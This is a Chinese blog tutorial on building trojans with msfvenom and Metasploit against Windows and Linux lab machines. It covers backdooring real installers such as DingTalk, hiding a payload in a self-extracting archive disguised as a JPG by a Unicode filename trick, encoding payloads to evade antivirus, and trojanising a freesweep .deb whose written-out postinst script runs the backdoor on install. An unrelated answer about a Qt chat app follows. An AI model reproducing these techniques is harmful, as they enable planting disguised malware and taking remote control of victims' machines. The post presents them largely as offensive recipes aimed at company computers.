网络安全:制作 windows 和 linux 客户端恶意软件进行渗透

  1. 实战-制作 Windows 恶意软件获取公司财务电脑 shell
  2. 实战- WinRAR 捆绑恶意程序并自动上线 MSF
  3. 实战-制作 Linux 恶意软件获取公司服务器 shell
  4. 实战-制作恶意 deb 软件包来触发后门

1.制作 Windows 恶意软件获取 shell

msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机上执行,在本地监听上线

在这里插入图片描述

生成西瓜影音.exe 后门程序
使用一个编码器

在这里插入图片描述

使用两个编码器
在这里插入图片描述

参数说明
-a 指定架构如 x86 x64。 x86 代表 32 位, x64 代表 64 位。 32 位软件可以在 64 位系统上运行。所以我们生成 32 位的后门,这样在 32 位和 64 位系统中都可以使用。
–platform 指定平台,这里选择 windows,通过 --l platforms 可以查看所有支持的平台
-p 设置攻击载荷,我们使用 windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有攻击载荷
LHOST 目标主机执行程序后连接我们 Kali 的地址
LPORT 目标主机执行程序后连接我们 Kali 的端口
-b 去掉坏字符,坏字符会影响 payload 正常执行。
扩展:\x00 代表 16 进制的“00”组成的字符串。通过 ASCII 码换成能识别的就是:“00” -“00000000” - NUL。由于"00000000"是不可见字符,所以代码中没用。如图

在这里插入图片描述-e 指定编码器,也就是所谓的免杀,x86/shikata_ga_nai 是 msf 自带的编码器,可以通过 -lencoders 查看所有编码器
-i 指定 payload 有效载荷编码迭代次数。 指定编码加密次数,为了让杀毒软件,更难查出源代码
-f 指定生成格式,可以是 raw,exe,elf,jar,c 语言的,python 的,java 的……,用 -lformats 查看所有支持的格式
-o 指定文件名称和导出位置。 指定到网站根目录/var/www/html,方便在肉机上下载后门程序

在 MSF 上启动 handler 开始监听后门程序
在这里插入图片描述

在这里插入图片描述

打开 win7 访问 Kali 搭建的 Web 服务下载执行文件

在这里插入图片描述

使用 virustotal 检测下生成后门的免杀能力,VirusTotal.com 是一个免费的病毒,蠕虫,木马和各种恶意软件分析服务,可以针对可疑文件和网址进行快速检测,最初由 Hispasec 维护。它与传统杀毒软件的不同之处是它通过多种杀毒引擎扫描文件。使用多种反病毒引擎可以令用户们通过各杀毒引擎的侦测结果,判断上传的文件是否为恶意软件。
打开:https://www.virustotal.com/

在这里插入图片描述

双击运行 西瓜影音 1.exe 程序
在 MSF 终端查看建立的 session
Shell 中输入 ipconfig 查看 win7 主机的 IP 地址

在这里插入图片描述
将会话保存到后台,方便以后使用
查看拿到会话后可以执行哪些命令

在这里插入图片描述

在这里插入图片描述

由于命令太多,不一一截图,大家可以自己去体验下每个命令的使用方法

模拟黑客给真正的快播软件加上后门
其实给任何软件都可以绑定后门,大家可以使用任何软件
先查看主程序会调用哪些附加的小程序,然后把 payload 后门和这些小程序绑定到一起。当然也可以直接加到主程序上,但是加主程序上,有时报错
这里我们用钉钉做一下演示
上传.exe文件到kali

在这里插入图片描述

对目标文件注入payload后门程序
在这里插入图片描述
使用生成的程序替换原来的程序
在虚拟机上下载我们替换好的文件
在这里插入图片描述

将文件夹制作成压缩包,上传至kali,然后在win7靶机中下载解压运行
在这里插入图片描述

在这里插入图片描述

回到kali加载攻击模块
在这里插入图片描述
解压

在这里插入图片描述

在这里插入图片描述

运行
在这里插入图片描述
在 Kali 上查看会话已经建立了,说明后门运行成功了

在这里插入图片描述

开启下屏幕共享

在这里插入图片描述

在这里插入图片描述

2.实战-利用自解压自动运行并上线 MSF

生成伪装恶意程序的封面图标
需要安装 rar 压缩工具
WinRAR 官网:http://www.winrar.com.cn/
下载安装即可不需要特殊配置

生成后门程序

在这里插入图片描述

准备一张图片
在这里插入图片描述

图片生成 ico 图标用于恶意程序的封面图标:http://www.ico51.cn/
注:图片尺寸选最大的,也可以找一下其它的 ico 图标生成网站。
在这里插入图片描述

转换后会自动下载
在这里插入图片描述

捆绑恶意程序和图片并设置自动运行
选中 dongman.exe 和 dongman.jpg 添加到压缩文件

勾选:创建自解压格式压缩文件
在这里插入图片描述

设置自解压选项
在这里插入图片描述

解压路径:C:\Windows\Temp
在这里插入图片描述

设置解压后运行
在这里插入图片描述

设置模式为全部隐藏

在这里插入图片描述

更新方式
多次解压可能会出现文件已经存在的情况,如果文件存在会询问用户。
建议选择覆盖所有文件或跳过已存在的文件。
覆盖:缺点是如果 exe 程序已经运行那么覆盖会失败。
跳过:如果 exe 文件的参数有修改跳过后则运行的还是旧版本。
建议:每次制作不要用相同的名字。

在这里插入图片描述

添加刚才生成的 ico 图标。

在这里插入图片描述

生成后的自解压文件
在这里插入图片描述

使用 Unicode 字符修改文件名后缀
在这里插入图片描述

最终效果,文件有 ico 图标伪装图片的缩略图,文件名后缀.jpg 来伪装文件类型。
注:exe.不可以去掉

在这里插入图片描述

我们上传做好的图片到kali的/var/www/html目录下
然后再目标win7主机上下载
在kali中打开msf指定模块,在目标主机上点击我们做好的图片,如果是在主机上运行要记得先关闭杀毒软件

在这里插入图片描述

看到这里的你们是否也打开了我发的某张图片呢

我们打开资源管理器可以看到dongman.exe可疑进程,这时我们结束进程

在这里插入图片描述
防御成功

在这里插入图片描述

3.实战-制作 Linux 恶意软件获取 shell

使用 msfvenom 生成 linux 可执行文件
参数和生成 Windows 差不多
在这里插入图片描述

–platform 指定 linux
-f 指定 elf 即 linux 操作系统的可执行文件类型
-b 去掉坏字符

加载我们的攻击模块
在这里插入图片描述

打开一台centos7虚拟机,下载我们制作好的后门,添加执行权限,执行后门程序
在这里插入图片描述

回到kali发现我们已经拿到了shell

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

4.实战-制作恶意 deb 软件包来触发后门

制作恶意软件包使用–download-only 方式下载软件包不进行安装
注:freesweep

在这里插入图片描述

将软件包移动到 root 目录

在这里插入图片描述

解压软件包到 free 目录

在这里插入图片描述

生成恶意代码到软件包源文件中

在这里插入图片描述

生成软件包时无论是 payload 的和软件包信息都需要选择能够在目标操作系统上执行的。
创建软件包信息目录

在这里插入图片描述
创建软件包的信息文件
tee /root/free/DEBIAN/control << ‘EOF’
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.
EOF

在这里插入图片描述

创建 deb 软件包,安装后脚本文件,来加载后门

tee /root/free/DEBIAN/postinst << ‘EOF’
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF

sudo /usr/games/freesweep_sources 是我们要执行的恶意代码
& 是将命令放到后台运行

给脚本文件添加执行权限
构建新的 deb 安装包

在这里插入图片描述

在msf中打开指定的模块进行监听
在这里插入图片描述

在kali中执行我们做好的软件包
在这里插入图片描述

成功拿到权限
在这里插入图片描述

kali一开 全世界都是我的

  • 5
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
好的,下面是基于Qt制作服务器端和客户端的步骤: 1. 首先,需要安装Qt开发环境。可以从Qt官网下载安装包,然后按照提示进行安装。 2. 创建一个新的Qt项目,选择"Qt Widgets Application",然后在下一个页面中选择"Server",并设置项目名称和路径。 3. 在项目中添加服务器端代码。可以在Qt Creator中创建一个新的类,然后编写服务器端代码。服务器端代码需要监听客户端的连接请求,接收客户端发送的消息,并将消息转发给其他客户端。 4. 使用Qt Designer来设计服务器端的界面。可以添加一些控件,如按钮、文本框等,用于显示服务器端的状态和接收客户端的输入。 5. 在服务器端代码中添加逻辑,将控件和代码进行连接。例如,当点击"启动服务器"按钮时,调用服务器端代码中的启动函数。 6. 创建一个新的Qt项目,选择"Qt Widgets Application",然后在下一个页面中选择"Client",并设置项目名称和路径。 7. 在项目中添加客户端代码。可以在Qt Creator中创建一个新的类,然后编写客户端代码。客户端代码需要连接服务器端,并发送和接收消息。 8. 使用Qt Designer来设计客户端的界面。可以添加一些控件,如按钮、文本框等,用于显示客户端的状态和输入消息。 9. 在客户端代码中添加逻辑,将控件和代码进行连接。例如,当点击"连接服务器"按钮时,调用客户端代码中的连接函数。 10. 最后,在Linux环境下,需要使用命令行界面来测试这个即时聊天工具。可以打开多个终端窗口,分别运行服务器端和不同的客户端,并且在客户端之间发送消息进行测试。 以上是一个基本的实现方案,具体实现细节还需要根据具体的需求进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

White boy&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值